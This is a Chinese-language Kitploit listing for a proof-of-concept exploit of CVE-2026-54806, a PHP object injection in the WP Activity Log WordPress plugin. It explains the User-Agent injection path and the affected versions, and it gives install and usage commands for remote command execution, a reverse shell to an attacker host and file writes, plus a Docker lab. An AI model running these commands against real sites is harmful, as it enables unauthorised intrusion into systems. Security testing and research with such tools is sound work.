Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-54806 — 针对CVE-2026-54806的概念验证漏洞利用:WP Activity Log插件中的未认证PHP对象注入,通过User-Agent头实现盲RCE。包含漏洞检查、命令执行、反向shell和文件写入功能,并附带自包含的Docker实验室。 | Kitploit
工具/GitHubGitHub/joshuavanderpoll/cve-2026-54806
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具Payload 开发实验室与实践
GitHubjoshuavanderpoll/cve-2026-54806

CVE-2026-54806

针对CVE-2026-54806的概念验证漏洞利用:WP Activity Log插件中的未认证PHP对象注入,通过User-Agent头实现盲RCE。包含漏洞检查、命令执行、反向shell和文件写入功能,并附带自包含的Docker实验室。

查看仓库
5462个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WP Activity Log PHP 对象注入 (CVE-2026-54806) PoC

Python

📜 描述

CVE-2026-54806 是 Melapress 开发的 WP Activity Log WordPress 插件(wp-security-audit-log)中一个严重的(CVSS 9.8)未认证 PHP 对象注入漏洞。未认证的攻击者可以在任何触发日志事件(例如登录失败)的请求中,通过 User-Agent 头注入序列化的 PHP 对象。注入的载荷会存储在数据库中,当管理员访问 WordPress 仪表盘时会被无限制地反序列化,从而实现盲远程代码执行(不会向攻击者返回任何输出)。

受影响插件: WP Activity Log <= 5.6.3.1(已在 5.6.4 中修复)

RCE 所需条件: WordPress 6.4.0 - 6.4.1 — 此 PoC 使用 WP_HTML_Token gadget,这是唯一一个所有属性均为公有的 WP 核心链,能够通过 sanitize_text_field() 并符合 255 字符的列限制。

✨ 功能

  • 漏洞检测 — 通过 --check 进行非破坏性检测
  • 命令执行 — 通过 --command 注入命令
  • 反弹 Shell — 通过 --shell 注入反弹 Shell
  • 文件写入 — 通过 --write-file 写入文件
  • 无需认证 — 通过登录失败的 User-Agent 注入载荷
  • 盲 RCE — 不返回命令输出;如需交互请使用反弹 Shell 或文件写入
  • 🛠️ 安装

    OSX/Linux

    root@kitploit:~
    git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
    cd CVE-2026-54806
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

    Windows

    root@kitploit:~
    git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
    cd CVE-2026-54806
    python3 -m venv .venv
    .venv\Scripts\activate
    pip3 install -r requirements.txt
    

    ⚙️ 用法

    root@kitploit:~
    python3 cve-2026-54806.py -t <target> --check
    python3 cve-2026-54806.py -t <target> --command <cmd>
    python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
    python3 cve-2026-54806.py -t <target> --write-file <content> <path>
    

    🐋 Docker PoC

    自包含实验环境,包含 WordPress 6.4.1 + WP Activity Log 5.6.3.1。详情请查看 DOCKER.md。

    root@kitploit:~
    cd docker
    docker compose up -d
    python3 cve-2026-54806.py -t http://localhost:8080 --check
    

    该实验环境包含一个 admin-bot,每 60 秒访问一次仪表盘,因此注入的载荷会自动触发——无需手动交互。

    🕵🏼 参考

    • WP Activity Log — Melapress
    • NVD — CVE-2026-54806
    • Patchstack — CVE-2026-54806

    📢 免责声明

    本工具仅用于教育和研究目的。创建者不对因使用本工具而造成的任何误用或损害承担责任。

    下载工具